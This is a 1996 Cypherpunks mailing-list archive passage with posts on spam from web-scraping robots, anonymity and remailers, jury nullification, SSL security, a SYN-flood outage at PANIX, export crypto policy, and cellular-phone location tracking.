Message-ID: <Pine.BSF.3.91.960912225041.4680E-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 12 Sep 1996, Timothy C. May wrote:

> At 9:48 PM 9/12/96, Rabid Wombat wrote:
> >>
> >> These people have invited the email, and the associated expense, by placing
> >> a public email-to: button on their public www page.
> >
> >
> >Most people put up an "email to:" button on a public page for
> >communications related to what's on the page. It's quite a stretch to
> >assume that this invites any and all email from anyone who cares to send
> >whatever they want. I can't say I've ever seen one that said "Please send
> >SPAM(tm) to:" ...
> 
> But to attempt to define "SPAM" (unless you're Armour) is dangerous. This
> whole notion of "unwanted mail" is ill-defined and not something "the law"
> should get involved in, in my view. (And CP technologies certainly are
> consistent with this, e.g., placing the role of screening on those who set
> up gates, not on tracking down True Names for prosecution.)
> 

Hormel, isn't it? Anyway, my point is that the law should not be involved
in it, but that it is going to be sucked in whether we like it or not if
social pressure is ineffective. What is, and is not "spam" has been
debated on usenet since the dawn of 'net time. While most newsgroup
members agree that traffic should stay more or less "on topic", few can
agree to just what "on topic" is. Sorta like the "Pornagraphy Definition"
of "I can't define it, but I know it when I see it" being entirely a matter
of one's own present and subjective opinion, and therefore impossible to 
codify. 

We're therefore stuck - as a community, we cannot stop what many people 
consider to be undesirable, as we cannot even define it, and the unwashed 
masses will set governance upon us for our "own good."

The community does try to prevent this undesirable sort of communication; 
many people will take it upon themselves to complain to the originator of 
the "mass mailing", and, if that fails, to the ISP providing 
connectivity. When the "mass mailing" is posted through a remailer, this 
becomes somewhat more difficult.

The ability to be anonymous on the 'net is generally a good 
thing. It has allowed people access to information that might have 
otherwise been denied them. It is an important freedom, and one that is 
already in danger of being taken away through legislation (Georgia on my 
mind ...). Abuse of this freedom by someone for purely commercial 
purposes is certainly not going to help matters.

Note the earlier comment about someone being unhappy about their 
"remailer-baby" being used for such a purpose - someone running a 
remailer is generally doing so as a service, and is generally not 
compensated for the equipment, time, energy, and aggravation. A lot of 
remailers have shut down recently. Is this helping the cause of privacy 
and free speech?

I have no complaint against anyone voicing their opinion, and defend 
their right to do so. However, I don't agree that a different set of 
standards somehow applies to those who provide a means to contact the 
providor of web content as a courtesy to their readers. Why does it fall 
to them to provide a completely off-topic forum for someone else's views? 
How are they any different from members of a public mailing list? Must 
the members of c'punks and toad.com accept all unpaid advertising in the 
name of free speech?


> >However, since others may think like you, I guess I'll have to add a line
> >above my link stating that email not related to the purpose of my site
> >will be happily proof-read at the rate of $200 per hour, 1 hour per 60
> >lines, minimum. Perhaps I'll get lucky. If I get a big enough chunk of
> >SPAM(tm), it might be worth the costs of breaking down the anonymity.
> 
> As the legal eagles will tell you, the essence of a contract is a two-way
> agreed upon set of terms, not a one-way "if you send me mail I decide I
> don't want, you will have incurred a charge of $1000." Try enforcing your
> $200 an hour "proofreading charge" in any court in the land.

Sarcasm, Tim. I really wouldn't expect this to work, and doubt anyone 
else would. Just trying to point out that when all else fails, our 
society generally pursues resolution through the courts (could be worse, 
I suppose, but I for one think we are far too prone to this - OTOH, we 
seem to have slipped from "right" to "legally defensible" somewhere back 
there).

> 
> (I've been saying this thing for several years. Who knows, maybe Rabit
> Wombat was the first to use it. Whatever, it's as unenforceable and
> meaningless now as it was several years ago.)
> 

Yes, it is meaningless, legally. It was not meant to be taken seriously, 
any more than the "dead skunks" were. Where the hell would I get 100 dead 
skunks at this time of the night? I don't even know if I have that much 
ammo left over from last weekend.

> >No, this b.s. is more like having someone put a dead skunk in my mailbox,
> >with no return address, trying to prevent me from sending them 100 dead
> >skunks as a return favor. And about as welcome.
> 
> In the case of actual USPS mailboxes, there are laws which prevent others
> from using them (e.g., no UPS or FedEx deliveries). For sure, dead skunks
> can be placed in mailboxes, or under porches, or whatever. The law can't
> fix everything.

No, and it ought to be the last resort.

- r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 13 Sep 1996 16:49:12 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Jury Nullification = Voting One's Conscience
In-Reply-To: <ae5cc281090210049385@[207.167.93.63]>
Message-ID: <Pine.BSF.3.91.960912232843.1738F-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Sep 1996, Timothy C. May wrote:

> At 9:18 PM 9/11/96, Brian Davis wrote:
> >On Wed, 11 Sep 1996, jonathon wrote:
> >> On Wed, 11 Sep 1996, Gary Howland wrote:
> >>
> >> > > But the public *is* asked to assent to those methods - your chance
> >>to vote
> >> > > on them is known colloquially as "jury duty".
> >>       But judges have said that Jury Nullification is not acceptable
> >>       legal practice.
> >
> >And other judges have said the opposite.
> 
> And I don't think there has _ever_ been a case of a juror prosecuted/jailed
> for voting his or her conscience, regardless of jury instructions. Short of
> explicitly selling one's vote, or discussing the case during deliberations
> with outsiders (and probably not even then), one is essentially free to
> vote one's conscience (however foolishly, as the O.J. case showed).

Agreed.  A petit jury is when citizens have the right and power to do 
what they will.  Juries are supposed to judge the facts and, if they 
don't believe a fact necessary for one side to win, then the other side wins.

But that's not the end of it:  Lawyers play on jurors' sympathies all the 
time -- spouse and kids in the front row (crying), "mentioning" a 
defendant's extensive medical problems, etc.  The jury can accept these 
or not.  Occasionally, a jury will buy into some of that and the judge 
will be so disgusted at what *he* sees as an injustice, that he will 
lecture the jury before dismissing them.

Yes, jurors swear an oath to follow the law as the judge gives it to 
them, but jury nullification is well-established in Anglo-American 
jurisprudence.  One of my local federal district judges seriously 
considered instructing the jury on its "right to nullify" at the close of 
the case.  Obviously, he didn't care for that particular prosecution.  It 
wasn't my case, so I don't know if he ultimately instructed the jury on 
nullification, but I know the prosecutor was running around the library, 
looking for ammo to use in his argument against the instruction.

And yes, in an appropriate case, I can see myself asking the judge for 
such an instruction -- and I see myself, in effect, arguing it in closing 
in many more cases.

> 
> And the principle is a good one: jurors should not have to fear prosecution
> for voting their consciences, regardless of technical details imposed by a
> judge. And, of course, jurors are not required to give a court their
> "reasons" for voting as they do.
> 
> Though I often condemn aspects of the American political and legal system,
> it is true that an awful lot of things are done right.

Perhaps, like democracy, it is the worst system possible, except for 
every other system man has invented.  

EBD 

> --Tim May, who served _once_ on a jury (for a speeding case) in 1973, who
> was called once since then, but not actually called for a jury. (I vote
> every election, I am duly registered with the DMV, so I wonder why I have
> only served once in 24+ years of eligibility.)
....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Fri, 13 Sep 1996 16:57:27 +0800
To: cypherpunks@toad.com
Subject: Re: [Long] A history of Netscape/MSIE problems
In-Reply-To: <517brn$lu7@life.ai.mit.edu>
Message-ID: <32390335.6231@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Hallam-Baker wrote:
> 
> There was a long list of security holes in SSL, PCT plugged a good
> number of them and SSL v3 plugged a few.

This statement surprises me.  It appears to mean that you think PCT has
fewer holes than SSL 3.0.  If you know of any holes in SSL 3.0, I'd be
very interested in hearing about them.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren James Rittle <rittle@comm.mot.com>
Date: Fri, 13 Sep 1996 14:58:15 +0800
To: cypherpunks@toad.com
Subject: Re: [Long] A history of Netscape/MSIE problems
In-Reply-To: <199609120716.IAA00231@server.test.net>
Message-ID: <9609130448.AA21647@supra.comm.mot.com>
MIME-Version: 1.0
Content-Type: text/plain



>Date: Thu, 12 Sep 1996 08:16:47 +0100
>From: Adam Back <aba@dcs.ex.ac.uk>

>> The attacks on RC4 are a prime example of a publicity attack.  They were
>> carried out by volunteers using borrowed machine time, noone (apart from
>> Netscapes stock prices) was harmed, 

>Strangly (I'm not sure if anyone lost money due to this), I think
>Netscapes prices hardly suffered, perhaps even improved slightly.
>Could be due to the `any publicity is good publicity' syndrome.  There
>was a *lot* of publicity, and Netscapes response in fixing the problem
>was good.  Several US cypherpunks were tracking the stocks at the
>time, and could probably verify this.

I have been tracking Netscape stock closely since the IPO.  I can
safely say that Netscape stock didn't suffer one iota when the news
reports of the cypherpunks' attacks hit the papers.  I agree with
Adam, Netscape stock generally rose (err, skyrocketed would be a
better word) the entire time of the cypherpunks incidents.

[Anyone can verify this analysis by comparing the chart at
 http://www.stockmaster.com/sm/g/N/NSCP.html with the dates
 of the cypherpunks incidents (all important dates in 1995 by my
 records).]

Netscape's stock price has generally fallen since these incidents, but
this was obviously (if anything is obvious when it comes to matching
stock price swings to real events :-) caused by increased general
market pressure and, quite importantly, the fact that Microsoft was
able to deliver a reasonable product with which to compete with
Netscape in such a timely fashion.  I think even close Microsoft
watchers were surprised by the Microsoft's speed to market with
something quite decent.

In retrospect, none of this surprises me.  The stock's fall from grace
was predicted (at least by myself), just the exact timing for the fall
was far different than I expected.  None of this is to say anything
about a Netscape fall from grace, as a company.  They make great
product, but the skyrocketing stock price after the IPO made no sense
to me.  Anyone that looked closely at the IPO model (early investors
got *huge* chunks of shares at mere pennies/share) and the evolution
of the software market should have been able to plainly see that
$170/share for Netscape (pre-split price hit early Dec 1995 and late
Jan 1996) is insane.

I wonder who bought at $170?

Regards,
Loren

-- 
Loren J. Rittle (rittle@comm.mot.com)	PGP KeyIDs: 1024/B98B3249 2048/ADCE34A5
Systems Technology Research (IL02/2240)	FP1024:6810D8AB3029874DD7065BC52067EAFD
Motorola, Inc.				FP2048:FDC0292446937F2A240BC07D42763672
(847) 576-7794				Call for verification of fingerprints.
Of course, these are my opinions, not Motorola's.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 13 Sep 1996 16:07:20 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: jury nullification/selection
In-Reply-To: <2.2.32.19960912075929.00691470@pop.ricochet.net>
Message-ID: <Pine.BSF.3.91.960912234601.1738G-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996, Greg Broiles wrote:

> 
> Sorry if I was too terse earlier. I hadn't intended to start a big FIJA dustup.
> 
> I think that government sleaziness is not only useful in a true
> nullification argument ("he's guilty but you should acquit anyway") but

Certainly, the nullification argument can be used in the "send the 
government a message" sense, but it is more likely to be successful IMO 
in a "poor, poor pitiful me" argument.

> where it reflects on the credibility of testimony and the prosecution's case
> in general. It's easy to imagine a prosecution which rests on the testimony
> of people who lie every day (criminally involved informants, jailhouse
> informants, and undercover cops) and/or real evidence which was gained
> through the use of subterfuge and trickery (like wiretap/body wire
> evidence). The idea is to make the government look sleazier and trickier
> than the defendant(s) and the defense witnesses. If the government's
> evidence ends up being tainted directly or indirectly by lying, trickery,
> etc., then the defense can argue "Hey. You can't trust anyone who got up on
> that stand and talked to you. And if you don't know who to trust and you
> think everyone's lying, the government's got no case. And if they've got no
> case, the judge will tell you that you must acquit." 

This happens in most criminal trials in my area to at least some extent 
and to an ever greater degree in drug prosecutions (more material ...). :-)

 
> So I think that public distaste and discomfort with weirder and sleazier
> tactics on the part of cops can be (and is) discussed and used and "voted

You need to know who is on your jury.  Many goverment employees, 
retirees, and housewives (who frequently populate juries) are at least as 
likely to not care what the cops did while looking at, say, a young black 
male defendant charged with distributing drugs.

> on". "Not guilty" doesn't necessarily mean "innocent", sometimes it means
> "The prosecution didn't have enough evidence I thought I could trust." 

Not Guilty *never* means innocent.  It means not proven guilty beyond a 
reasonable doubt (or "we nullified"). 

> And yes, I agree that even mentioning nullification during voir dire will
> probably get you kicked off of a jury; and I think that's partly because one
> party or the other will be scared of nullification, and partly because the
> term "jury nullification" makes people think of FIJA and associated loons.
> Nobody wants a loon on the jury. (I don't think everyone who argues for
> nullification is a loon, but some of them sure are - and there's no good way
> to figure out whether someone's a loon or not in the middle of jury selection.) 
> 
> And I also agree that the jury selection process tends to select away from a
> true cross-section of society; but the few easily available examples (big
> trials like OJ or the Menendez Bros. or Wm. Kennedy Smith or whoever) are
> poor examples because they're not typical. Trials where lots is at stake

Especially because $$$ is available to hire jury experts, do a summary 
mock jury trial to test theories out, and have a shadow jury.

> (death penalty or celebrity defendant or big $ civil trials) tend to have
> longer processes (which weed out everyone who isn't incredibly boring) but
> it's not at all uncommon to pick a jury in a morning or in a day or two. In

My personal record in a federal criminal case is four hours -- from jury 
selection to verdict.  The defendant later threatened to kill his lawyer, 
the probation officer, the judge and ... me.

> federal court, the judge usually questions the jury instead of the attorneys
> (which is faster), and may or may not ask questions that the attorneys have
> suggested. Also, sometimes one side or the other will *want* especially
> analytical or technical or well-trained jurors. Attorneys want to pick a
> jury they can persuade, but they also want to pick a jury that can
> understand their theory of the case. 
> 
> So I guess my point is that while the jury system isn't perfect, it is in
> some ways a much more direct way to "vote" on how things work in the
> judicial and law enforcement systems. I think it's more immediately and
> directly democratic than the electoral system. All of the legal bullshit
> aside, it's possible to think about trials as a way for people who have some
> sort of problem (they've been injured or accused of a crime or whatever) to
> tell a group of uninvolved people about the problem and ask them what the
> right thing to do is. Yeah, that's really oversimplified, but I think that
> what juries do is important and that what they do has a political and a
> moral dimension even if attorneys aren't supposed to talk about it during
> argument. 

Roger that.
The first case I ever tried, I lost.  I was very unhappy.  But the victim 
was quite pleased.  She felt that she had the opportunity to say what she 
had to say ... let it all out ... and everything was fine.  There is some 
value in "reverse allocution."

EBD


> --
> Greg Broiles                |  "We pretend to be their friends,
> gbroiles@netbox.com         |   but they fuck with our heads."
> http://www.io.com/~gbroiles |
>                             |
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 13 Sep 1996 14:57:55 +0800
To: M C Wong <mcw@hpato.aus.hp.com>
Subject: Re: PANIX.COM down: denial of service attack
In-Reply-To: <199609130334.AA161125684@relay.hp.com>
Message-ID: <199609130408.AAA09629@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



M C Wong writes:
> >                For those who are IP hackers, the problem is that we're
> >                being flooded with SYNs from random IP addresses on
> >                our smtp ports. We are getting on average 150 packets
>                      ^^^^
> 
>                  Can't access to this port be guarded against by a filtering
> 		 router which is configured to accept *only* a number of
> 		 trusted MX hosts ?

Sure -- if you only want to accept mail from fifteen machines on
earth. If on the other hand your users might get mail from anywhere on
earth, your mail ports have to be open to connections from anywhere.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 13 Sep 1996 15:36:10 +0800
To: M C Wong <mcw@hpato.aus.hp.com>
Subject: Re: PANIX.COM down: denial of service attack
In-Reply-To: <199609130416.AA198858212@relay.hp.com>
Message-ID: <199609130421.AAA09822@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



M C Wong writes:
> > >            Can't access to this port be guarded against by a filtering
> > > 		 router which is configured to accept *only* a number of
> > > 		 trusted MX hosts ?
> 
> > Sure -- if you only want to accept mail from fifteen machines on
> > earth. If on the other hand your users might get mail from anywhere on
> > earth, your mail ports have to be open to connections from anywhere.
> 
> No, I am saying that we use MX field in DNS to specify our MX hosts, so
> other hosts from anywhere else will timeout connecting to the target smtp
> while trying to deliver mails directly to it, and hence will have to send 
> the message to next best MX host instead, and the firewall is configured 
> to permit access *only* from those MX hosts.
> 
> The problem here becomes how one can protect all those MX hosts instead.

You can't. All you are doing is moving the problem. I don't see how
that could be of any possible interest. The machines in question are
already the MX hosts for the zone.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Fri, 13 Sep 1996 16:44:54 +0800
To: cypherpunks@toad.com
Subject: Re: mailing lists
In-Reply-To: <3238648F.207@precipice.v-site.net>
Message-ID: <960913.002423.7Q6.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, robert@precipice.v-site.net writes:

> Why not put your money where your mouth is, and bet me (any amount),
> that spam WILL be socially acceptable by the year 2000.  Particularly,
> when the green-folks discover how many trees will be saved.  It'll be
> a social-mandate, NOT just a suggestion.  Want to bet?

Bryce had a great idea when he suggested a mail filter with a $1 ecash
deposit required for first contact.  It would certainly help out when
people who Don't Get It start to misbehave.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjjwxBvikii9febJAQFqJgP8Dba9ElftL7FLnpBfzf4YxARw4GUiFKn0
dsXBBPzP3K/Tv1okiR2/7jPwPEaTjwZIkOt4FwjoipFdQqNG6b6D87LOWmSLxYw0
qEw91mquDFeByZewETp/lVG66Ff834crZB0/6UCG00MUip5PWt1VXOMBwjc3pjQD
P+yJ+NEBlA0=
=zwwH
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 13 Sep 1996 15:08:57 +0800
To: HipCrime <robert@precipice.v-site.net>
Subject: Re: who can count?
Message-ID: <9609130433.AB09422@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 12 Sep 96 at 17:57, HipCrime wrote:

> > No, this b.s. is more like having someone put a dead skunk in my
> > mailbox, with no return address, trying to prevent me from sending
> > them 100 dead skunks as a return favor. And about as welcome.
> 
> 100 dead skunks in exchange for ONE is exactly what this discussion
> is all about.  You CypherWIMPS just love over-kill.  EmailRobot sent
> ONE message to EACH address.  Are you guys so unskilled in
> arithmetic to understand the difference between 1 and 100?
> 
> One message is NOT spam, 100 messages to a single box IS spamming.

Dear HipCrime,

My e-mail address is *paid for*, I subscribe to it for my own 
self-interest *only*.  I do send requests for junk mail from various
companies that falls into my fields of interest.  But take note that
since *I* pay for it, I consider it as my private territory.  If you
want to trespass, it is up to you and for the moment, there is nothing
much I can do, unfortunately.

I invite you to send me as much spam as you want, as long as you send
me 0.1 gram of pure, 24k gold per kilobyte of spam (rounded to the
superior Kb, i.e. 1.1Kb=.2g Au) you send me, payable in gold at the
rate of the next day the spam was received by me, delivered at my
local mailbox within 30 days (2% monthly fees applies).  As long as
you send payement, your spam will be welcome. (And don't send
"spoofed-gold" I've got an eye for the genuine stuff :)

Of course my rates are steep and non-negotiable, but there hey, what
is morally objectionable in making profit when I don't *force* anybody
to accept?

Regards

jfa

p.s.  e-mail me privately for my postbox address. 
- -- 
Jean-Francois Avon, Montreal QC Canada
 DePompadour, Societe d'Importation Ltee
    Finest of Limoges porcelain and crystal
 JFA Technologies, R&D consultant
    physicists and engineers, LabView programing
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAgUBMjh/3ciycyXFit0NAQE0eQgApAM5ESHO/rTv6CcpFCXizEI4+5WcCjWx
Aq2IBAXhfHXCgfne5mo/K4U1PrlumxfxMA1NiQ0QQ7R1hgnzocF/NlnzMrX9vkVc
w1NpAFr5hc2Jr5hOyBhr/tZsvYwcQXCdAqrA+Pj/qSDDPmeO8GGfoK09Xgrsvy16
zRQTGjOh/3ko4vTGuOMCiLSPJ4vLqFfAcvF6arJ2cEBXl7opoVFVGmvIugcosTN7
gZ97lWrJiEbc/HnHT5dkgTXpqDZQkC/PLz7EmXIYdf65zCJ1G3DRYgYpXQXd3V+a
nXyc3i2TDW5/tlnk6SLZvwaApzwAMtn5ZHNgBlgCIQHootcIf+Zulw==
=+bxp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 13 Sep 1996 16:15:46 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
Message-ID: <9609130432.AA09422@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 12 Sep 96 at 20:03, Rabid Wombat replied to a spammer with an 
Attila the Hun (looter and plunderer) mentality:

> > > However, since others may think like you, I guess I'll have to
> > > add a line above my link stating that email not related to the
> > > purpose of my site will be happily proof-read at the rate of
> > > $200 per hour,


The looter speaking here:

> > How can you hope to
> > enforce it?  It's a joke, right? :)  Maybe not, since it's on your
> > sig-line.

that is one of their way of seing life: as long as you have the 
physical means to perform an action and that nobody else can stop 
you, you can do it.

> > A website is
> > an open invitation to comment and e-mail.

Again, he doesn't ask himself why the page, put into existence (most 
of the time by the good will of the creator and owner of the account, 
paying out of his own pocket from his own work) does not bear the 
mention: "we invite spam"

> > Better password your
> > site if you want to solve this problem.

"Civilisation, is the transition from a public society to a society 
of privacy" (approximate quote from Ayn Rand).  We have laws that 
hope to accomplish that, i.e. trying to set men free from other mens. 
Passwording is like putting a lock on a door: to prevent intrusion 
from peoples that have different values.  Note that the trespassing 
is *always* done in favor of the looters at the expense of the 
producers.


> > Then no-one can visit it,
> > and no-one can send out a spider to get your e-mail address. 
> > That's what I do, send out a robot to bring back e-mail addresses.
> >  Of course I only send to makers of software, and my product
> > applys to their world.

I'm glad the tresspasser limits the field of his victims.
 
> Comment is one thing. Mass junk mail is another. I'd view "comment"
> as expressing an opinion. If I put an "email to:" tag on a web site,
> I'm inviting "comment" on the information I've placed in public view
> - there's reasonable expectation that the "comment" will be
> pertinent, even if it is only "Your automated gif sucks." This isn't
> quite the same as inviting completely irrelevent junk mail, and I
> still fail to see how you make this leap of logic.

He does it very simply: by blanking out the nature of his acts.  
Only, there is no logic in this act, only feelings.  
 
> You are on a public mailing list, aren't you? You have some degree
> of expectation as to the pertinence of topics discussed on said
> list, don't you? Even if it is c'punks? The same holds true for
> newsgroups. The vast majority of 'net users dislike off-topic
> discussion; they subscribe to mailing lists and newsgroups to
> discuss topics of relevence and mutual interest. 


> It is highly
> self-centered of you to assume the "right" to waste their time with
> unwanted and completely off-topic communication. 

No, it is not self-centered at all, it is only done on the impulsion 
of the moment.  If he were smart, he would realize that reputation 
takes years to build and seconds to destroy.
 
 
> > If you don't want spam in your mail box:
> > 
> > 1. Don't have a website or don't put your e-mail address on your 
> >     website

If you don't want to get mugged, don't walk in the street; if you 
don't want to get killed by a mugger, chase him and offer him you 
wallet, then kill yourself.

I grew in an extended family where there was always money and
wallets on the kitchen table. But no matter how broke one of us were,
if it did not belong to him, he did not take it.  It is, of course,
out of respect for life (and it's economic extension, the right to
property)

> > 2. Don't post to newsgroups

Don't exists... ( because to him, the use of force is legitimate and 
there is no such right as the right to live, as long as he's got 
stronger arms than yours)


> > 3. Don't post to mailing lists

Ditto

> > 4. If you post do so anonymously

Act covertly, Live in fear.
 

> When you exercise your "right" to free speech to the extent that you
> piss off a large segment of society, society will react by reducing
> its measure of freedom of speech.

I won't start a discussion here.  I will simply state that words have 
a definite meaning and that by twisting them (I suppose innocently in 
your case), you give them a moral sanction.

jfa
Jean-Francois Avon, Montreal QC Canada
"One of theses centuries, the brutes, private or public, who believe
that they can rule their betters by force, will learn the lesson of
what happens when brute force encounters mind and force."
                                              - Ragnar Danneskjold
PGP key at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 13 Sep 1996 16:06:17 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: Sen. Burns' statement on postponement of Crypto vote today.
In-Reply-To: <199609122356.TAA01893@nrk.com>
Message-ID: <Pine.SUN.3.94.960913015026.29752A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996, David Lesher wrote:

> Robert Hettinga sez:
> > From: somebody
> > Administration in next two
> > weeks will unveil its "new and improved" encryption policy, which will likely
> > offer a shift in licensing to Commerce Dept., and gradual easing of
> > exportable strength, in exchange for industry-funded key escrow management
> > demo projects.
> 
> I hear that the Feebs and DOJ are upset that they do not have enough
> pull in NSA/Commerce decisions; and wants to get in the middle of
> process. Industry is screaming over that.

Hogwash.
James McAdams III in the Office of Intelligence Policy and Review is
arguably the most infuential intelligence policy official in the country.

DoJ has plenty of say and to my knowledge they are not at all bitching.

> 
> Of course, Feebs et.al have not legal standing in ITAR decisons, but
> that's not stopped 'em before....
> 
> 
> 
> -- 
> A host is a host from coast to coast.................wb8foz@nrk.com
> & no one will talk to a host that's close........[v].(301) 56-LINUX
> Unless the host (that isn't close).........................pob 1433
> is busy, hung or dead....................................20915-1433
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Sat, 14 Sep 1996 03:41:27 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: Fed appellate judge remarks re anonymity, free speech on the net
In-Reply-To: <2.2.32.19960913060631.006bf908@pop.ricochet.net>
Message-ID: <Pine.3.89.9609130741.A13117-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996, Greg Broiles wrote:

> At 09:24 PM 9/12/96 -0700, zachb@netcom.com wrote:
> >> (Also in today's news, the 9th Circuit upheld a CA statute forbidding sales
> >> of material considered "harmful to minors" from vending machines.) 
> >
> >Even if this statute is meant only to apply to cigarette machines, which 
> >would seem to be the case given all of the anti-cig stuff going on now,
> >what good will it do?
> 
> Whoops. Sorry. Wrong context. What I should have said was "the 9th Circuit
> upheld a CA statute forbidding sales of *printed* material considered
> 'harmful to minors' from unsupervised vending machines". The publication(s)
>

It's still mostly the same thing.  I've never seen the type of machine 
that you're talking about, and I don't think anyone would be dumb enough 
to install one in a store that is near a school, or frequented my 
minors.  This law just does not seem like a very good idea.



---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 14 Sep 1996 01:27:00 +0800
To: cypherpunks@toad.com
Subject: Re: Security technical list
In-Reply-To: <409if995@colphi.edu.ar>
Message-ID: <RP27TD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"MacGyver" <macgyver@colphi.edu.ar> writes:

> [pgp sign clear]
> Anybody could help me to find a mail list of security,crypto,etc??

1. Try codeprunks. Just e-mail majordomo@toad.com and say
subscribe coderpunks.

It's got some very interesting traffic, although it's pretty low volume.

2. Try the firewalls mailing list.

3. Try Usenet newsgroups alt.security,sci.crypt,etc. They have better
s/n ratio than this mailing list.

4. Try staying on the cypherpunks mailing list, but use procmail (or
equivalent) to filter out non-crypto-relevant rants, lies, and personal
attacks from *@got.net.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SCN User <bf578@scn.org>
Date: Sat, 14 Sep 1996 04:44:12 +0800
Subject: position of cellular phones
Message-ID: <Chameleon.960913085243.bf578@drink.aa.net>
MIME-Version: 1.0
Content-Type: text/plain


-->After seeing the messages about Federal Express doing something similar,
-->I thought this would be of interest:

Date: Mon, 09 Sep 96 17:41:31 GMT
From: campbellp@logica.com (Peter Campbell Smith)
Subject: Re: Locating the position of cellular phones (Stover, RISKS-18.41)

There is an interesting article in Traffic Technology International, 
Aug/Sept 96 issue about a system called CAPITAL that uses cellular phone 
calls as a probe to monitor road traffic around Washington DC.  It describes 
an experiment which has been running for two years and which has 
demonstrated that this is an extremely cost-effective alternative to 
conventional means of traffic monitoring.

The system is independent of the cellular phone system per se, but has 
antennae on the cellular phone masts which listen to the cellular 
frequencies. Every time a call is initiated, CAPITAL locates the caller by a 
combination of directional multi-element antennae and time-of-arrival 
analysis between different masts.  The geographical accuracy is reported to 
be to about 115m, and subsequent tracking allows the speed of the vehicle to 
be established within 30 to 50sec to an accuracy of 5mi/h.

At any time only less than 5% of vehicles are making calls, but this is a 
sufficient sample for analysing the traffic speed (though not presumably the 
traffic density).  Moreover, when the traffic slows down even more people 
make calls, so there is a better density of data from the areas most 
interesting to those monitoring traffic flows.

It is claimed that the boxes ignore the voice content of the call and that 
the data they deliver has randomly assigned identifiers for each call, so 
that nothing leaves the system which would allow calls to be associated with 
specific phones.

-->Until the government thinks it needs the info!



Peter Campbell Smith, Logica, London, UK  campbellp@logica.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sat, 14 Sep 1996 04:46:21 +0800
To: cypherpunks@toad.com
Subject: (fwd) Email Robot draws fire from CypherPunkz
Message-ID: <199609131602.JAA16146@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Path: news.eff.org!news.umbc.edu!haven.umd.edu!cs.umd.edu!news.abs.net!ddsw1!news.mcs.net!www.nntp.primenet.com!nntp.primenet.com!howland.erols.net!agate!boulder!ucsub.Colorado.EDU!peterson
From: peterson@ucsub.Colorado.EDU (Peterson Penny)
Newsgroups: alt.privacy
Subject: Email Robot draws fire from CypherPunkz
Date: 12 Sep 96 02:57:19 GMT
Organization: University of Colorado at Boulder
Lines: 11
Message-ID: <peterson.842497039@ucsub.Colorado.EDU>
NNTP-Posting-Host: ucsub.colorado.edu
NNTP-Posting-User: peterson
